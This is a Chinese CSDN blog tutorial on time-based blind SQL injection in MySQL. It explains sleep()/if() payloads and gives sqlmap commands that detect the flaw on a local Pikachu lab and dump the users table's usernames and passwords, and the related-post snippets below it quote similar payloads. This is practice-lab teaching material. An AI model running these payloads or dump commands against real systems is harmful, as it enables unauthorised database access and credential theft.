SQL注入手册-时间延迟注入

最新推荐文章于 2024-04-09 14:22:03 发布
最新推荐文章于 2024-04-09 14:22:03 发布
阅读量1.4k 收藏 7
点赞数 2
文章标签: sql android 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jdk12123/article/details/132629013
版权

SQL注入手册-时间延迟注入

1.1时间延迟注入简介:

时间注入又名延时注入,属于盲注入的一种,通常是某个注入点无法通过布尔型
注入获取数据而采用一种突破注入的技巧。
在 mysql 里 函数 sleep() 是延时的意思,sleep(10)就是 数据库延时 10 秒返回内
容。判断注入可以使用’and sleep(10) 数据库延时 10 秒返回值 网页响应时间至少
要 10 秒 根据这个原理来判断存在 SQL 时间注入。
mysql 延时注入用到的函数 sleep() 、if()、substring()
select if(2>1,sleep(10),0) 2>1 这个部分就是你注入要构造的 SQL 语句。
select if(length(database())>1,sleep(5),0) 这个就是查询当前库大于 1 就会延时 5 秒
执行。

1.2注入案例演示:

原理与布尔型盲注入一样,这里我们直接采用sqlmap这个自动化工具,开始注入:
sqlmap -u “http://192.168.141.130/06/vul/sqli/sqli_str.php?name=vince&submit=1” -p
name -v 1 --technique=T
-u 表示检测的 url
-p 指定的检测参数
-v 显示调试模式
–technique=T 检测方法为时间注入
请添加图片描述
结果如图显示,确实为基于时间延迟的盲注入。

sqlmap 检测为时间注入 接下来进行 通过这个注入获取数据库的名 用户权限,
表 字段等敏感信息的获取。
sqlmap -u “http://192.168.141.130/06/vul/sqli/sqli_str.php?name=vince&submit=1” -p
name -v 1 --technique=T --current-user --current-db --batch
–current-user 获取用户
–current-db 当前库
–batch 使用默认模式 自动 y
请添加图片描述
sqlmap 查询账号和密码
sqlmap -u “http://192.168.141.130/06/vul/sqli/sqli_str.php?name=vince&submit=1” -p
name -v 1 --technique=T --dump -C “id,username,password” -T users -D pikachu --batch
–dump 导出数据
-C 指定查询的字段请添加图片描述

NetDefend
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL注入延时注入
m0_56578216的博客
08-23 687
延时注入就是利用sleep()函数通过if语句判断所写的语句真假,如果为真返回我们想要的东西(例如:数据库的长度,数据库的名字等)如果我们写的东西不符合则会利用sleep()函数让服务器休眠。固定的理解sleep(x) 函数的意义是关键,就是个自行设定如果判断成功那么就会延迟x秒延时注入的关键是sleep函数和if语句,通过sleep函数判断语句的真假,。
sql注入-延时注入
课嗨教育的专栏
04-28 1397
渗透测试基础课-课程进度_不死的小鱼的博客-CSDN博客 延时注入和布尔盲注差不多 为什么要延时 因为有的时候我们知道这个地方存在注入但是页面返回信息一样 加了个if延时条件判断 if(条件,是,否) http://localhost/Less-9/index.php?id=1%27%20and%20if( 1<2,sleep(10),1)--%201 返回14秒 http://localhost/Less-9/index.php?id=1%27%20and%20if( 1>2,sleep(
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库
waitfor延迟执行语句 sql server
08-24
waitfor延迟执行语句 sql server
sql注入延时注入
最新发布
weixin_45653478的博客
04-09 1009
攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)--+ #延时5秒。
sql注入实例--安全等级
12-26
使用WebGoat,根据提示信息 ,完成包括Injection Flaw大类下的String SQL注入,Numeric SQL注入,Log Spoofing,XPATH Injection等安全弱点的攻击测试。
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
详解SQL注入--安全(二)
09-09
主要介绍了SQL注入安全,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
SQL注入延时注入
qq_45557130的博客
10-07 1518
sql注入延时注入
SQL注入--延时注入
weixin_52351575的博客
10-13 771
的时候是没有任何延迟的,所以判定它的首字母的ascii码值是107.找出ascii码表对应的首字母是f。原理:在没有得到任何回显的情况下,只能通过延迟页面的跳转来进行数据库的核对。我们看到界面,首先在url栏进行GET传参,但是没有任何回显,界面没有变化。接着,我们利用ascii()的函数去找出数据库的第一个字母的ascii码值。的时候,界面没有任何延迟,于是判定数据库的长度是12个字节长。所以判定我们输入的sql代码得到了执行。于是,我们输入代码,来查询数据库的长度。改90的值,依次递增,最终得到代码。
SQL注入(延时注入)---zkaq
weixin_38237216的博客
04-11 4735
1.概念 1.延时注入:当进行盲注的时候,无论输入什么payload都会返回正常的处理信息,无法根据正确与错误的payload得到报错信息。这个时候就需要使用特定的时间函数,通过查看web页面的返回时间差来判断 2.常用函数 sleep() :将程序挂起一段时间n为n秒 if(expr1,expr2,expr3) :判断语句;如果第一个语句正确就执行第二个语句如果错误执行第三个语句 2.靶场 1.pass-13—延时注入(一) 通过题目中的sql语句可知,入参是用"闭合的,使用" and 1=1 – q
SQL注入工具-御剑
06-07
SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑
sqlmap中文手册-sql注入自动化测试工具
07-19
sql注入自动化测试工具sqlmap的操作手册,中文版,值得拥有哦。Web安全测试必备工具。
SQLMAP渗透笔记之请求延时
Birdman-one的博客
12-26 9059
---------------------------------------------------------------------------------------------                    SQLMAP渗透笔记之请求延时 ---------------------------------------------------------
SQLMAP使用教程(三)实战技巧二
不秃头的程序Yang
07-05 903
二、使用基于时间的延时注入 四、读取文本进行SQL注入检测 六、修改默认最大线程
sql注入——延时注入
qq_52843411的博客
08-23 285
无论我们怎样变化,或者改变闭合,都无法是页面做出不同的回显,我们有理由相信他为一个静态页面,当然,作为一个练习,这个肯定是有漏洞的,我们可以通过页面相应的时间来做出判断,我们可以通过sleep()函数,来使页面进行延迟响应。我们对页面进行了延时,导致页面的响应时间比正常情况下都要慢五秒钟,我们可以通过对响应时间的长短,来判断真假,要判断真假,就要用到我们的if函数。)第一个字段为判读语句,第二个字段为判断为真时执行的语句,第三个字段为判断为假时执行的语句。我们可知第一个字符ASCII为53,即5。
SQL注入-06】延时注入案例
m0_64378913的博客
04-26 2532
1 概述 当改变浏览器传给后台SQL的参数后, 浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入;同时,输入参数为真或假也无法从页面显示上查出差异,无法使用布尔注入 ,这时候可以试试看能否使用延时注入延时盲注:也称延时注入、时间注入等,这种注入方式在传给后台的参数中,设置了一个if语句,当条件为真时执行sleep语句,条件为假时无执行语句,然后根据浏览器的响应时间来推测sleep语句是否被执行,进而推测if条件是否为真。 延时盲注与布尔盲注的核心思想都是通过浏览器两种
sql注入sql-labs
09-12
Sql注入sqli-labs是一个提供了各种不同难度级别的SQL注入漏洞练习的实验环境。要访问sqli-labs,你可以通过打开网站管理界面->打开sqli-labs来直接进入。点击第一行的"Setup/reset Database for labs"可以看到各个关卡。 如果你需要修改sqli-labs的数据库连接信息,你可以找到sqli-labs-master文件夹里的sql-connections文件夹下的db-creds.inc文件,并用记事本打开。在文件中,你可以修改用户名和密码。数据库密码可以在phpstudy的数据库栏中找到,将鼠标悬停在密码上可以看到它。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值